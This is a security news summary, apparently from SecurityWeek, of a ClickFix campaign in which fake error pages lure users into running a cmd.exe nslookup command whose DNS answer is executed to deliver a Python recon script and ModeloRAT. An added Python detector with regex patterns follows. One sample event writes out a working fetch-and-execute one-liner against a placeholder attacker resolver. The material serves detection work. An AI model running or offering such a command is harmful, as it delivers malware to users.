
"The initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system's default resolver. The output is filtered to extract the 'Name:' DNS response, which is executed as the second-stage payload," Microsoft explained. This tactic enables the attacker to reach their infrastructure and validate execution of the second-stage payload, increasing their chances of evading detection by blending malicious traffic into regular network traffic. The second-stage payload downloads and executes a malicious Python script designed for reconnaissance."
"The attack involves attackers displaying a fake error message on a compromised or malicious site. The message instructs the target to address the issue by pressing specific keys, then performing additional steps (eg, running a command). By following the attacker's instructions, the user unknowingly grants elevated permissions, downloads malware, or executes attacker-supplied scripts. In a recent ClickFix attack observed by Microsoft the attacker asked targets to run a command that executes a custom DNS lookoup."
Threat actors are leveraging a new ClickFix variant that displays fake error messages on compromised or malicious sites to trick users into pressing keys and running commands. Attackers instruct targets to run a command that performs a DNS lookup against a hard-coded external DNS server rather than the system's default resolver; the output is filtered to extract the 'Name:' response, and that response is executed as the second-stage payload. Because the fetch is a plain DNS query, it lets attackers reach their infrastructure, confirms that the first stage ran, and blends the malicious traffic with normal DNS traffic to evade detection. The second stage downloads and runs a malicious Python reconnaissance script, drops a final ModeloRAT remote access trojan, and establishes persistence. Some campaigns, tracked as KongTuke, targeted corporate environments.
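The chain described above (cmd.exe, nslookup against a hard-coded resolver, output filtered for the 'Name:' line, result executed) leaves a distinctive process-creation command line. The following is an added detection example written for this page; it is not Microsoft's, SecurityWeek's, or any vendor's code. The process events, the resolver addresses, the domain names, and the APPROVED_RESOLVERS allow-list are all constructed assumptions, not data from the reported campaign.

```python
"""Heuristics for spotting the nslookup-fetched ClickFix second stage.

Added example for this page (not the original article's code). All events,
IPs and names below are constructed; the allow-list is a stand-in for an
organisation's real resolver inventory.
"""
import re

# Assumption: resolvers this environment considers legitimate. Anything else
# passed explicitly to nslookup is a hard-coded, non-default DNS server.
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53", "dns.corp.example"}

# nslookup [-option ...] host [server]  -- capture up to the next pipe/quote/paren.
NSLOOKUP_RE = re.compile(r"\bnslookup(?:\.exe)?\b([^|&')]*)", re.I)
# findstr/find used to pull the 'Name:' line out of the nslookup output.
FILTER_NAME_RE = re.compile(r"\b(?:findstr|find)\b[^|&]*\bname\b", re.I)
# for /f ... do <token>: the filtered DNS answer becomes a command.
FOR_F_EXEC_RE = re.compile(r"\bfor\s+/f\b.*\bdo\b", re.I | re.S)


def explicit_nslookup_server(cmdline):
    """Return the explicit server argument of the first nslookup call, or None.

    The second positional argument to nslookup overrides the system resolver;
    '-' options (e.g. -type=mx) and cmd.exe's '^' escape are ignored.
    """
    m = NSLOOKUP_RE.search(cmdline)
    if not m:
        return None
    positional = [t for t in m.group(1).split()
                  if t != "^" and not t.startswith("-")]
    return positional[1] if len(positional) > 1 else None


def classify_command(cmdline, approved=APPROVED_RESOLVERS):
    """Return (severity, reasons) for a single process command line.

    high   : non-default resolver + Name: filter + for /f execution
    medium : one or two of those indicators
    none   : ordinary nslookup usage
    """
    reasons = []
    approved_lc = {a.lower() for a in approved}
    server = explicit_nslookup_server(cmdline)
    if server and server.lower() not in approved_lc:
        reasons.append(f"nslookup directed at non-default resolver {server}")
    if NSLOOKUP_RE.search(cmdline) and FILTER_NAME_RE.search(cmdline):
        reasons.append("nslookup output filtered for the 'Name:' line")
    if reasons and FOR_F_EXEC_RE.search(cmdline):
        reasons.append("for /f executes the filtered DNS output")
    if len(reasons) == 3:
        return "high", reasons
    return ("medium", reasons) if reasons else ("none", reasons)


def scan(events):
    """Return [(event_id, severity, reasons)] for every event that fires."""
    hits = []
    for ev in events:
        severity, reasons = classify_command(ev["cmdline"])
        if severity != "none":
            hits.append((ev["id"], severity, reasons))
    return hits


# Constructed process-creation events (Sysmon EID 1 style), not real telemetry.
SAMPLE_EVENTS = [
    # ClickFix-style one-liner: hard-coded resolver, Name: filter, for /f exec.
    {"id": "evt-1", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c for /f \"tokens=2\" %a in "
                "('nslookup c2.example.invalid 203.0.113.10 ^| findstr Name:') do %a"},
    # Ordinary troubleshooting against the system resolver.
    {"id": "evt-2", "parent": "powershell.exe", "image": "nslookup.exe",
     "cmdline": "nslookup www.example.com"},
    # Admin explicitly querying an approved internal resolver.
    {"id": "evt-3", "parent": "cmd.exe", "image": "nslookup.exe",
     "cmdline": "nslookup -type=mx example.com 10.0.0.53"},
    # Unapproved public resolver, but nothing filtered or executed.
    {"id": "evt-4", "parent": "cmd.exe", "image": "nslookup.exe",
     "cmdline": "nslookup example.org 198.51.100.1"},
]


if __name__ == "__main__":
    for event_id, severity, reasons in scan(SAMPLE_EVENTS):
        print(f"{event_id}: {severity}")
        for r in reasons:
            print(f"    - {r}")
```

On the constructed sample, evt-1 scores high on all three indicators, evt-4 scores medium for the non-default resolver alone, and the two routine lookups are ignored. In practice the allow-list should come from the actual DHCP/GPO resolver configuration, and the medium tier is best routed to a hunting queue rather than paged, since administrators do occasionally query public resolvers by hand.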
Read at SecurityWeek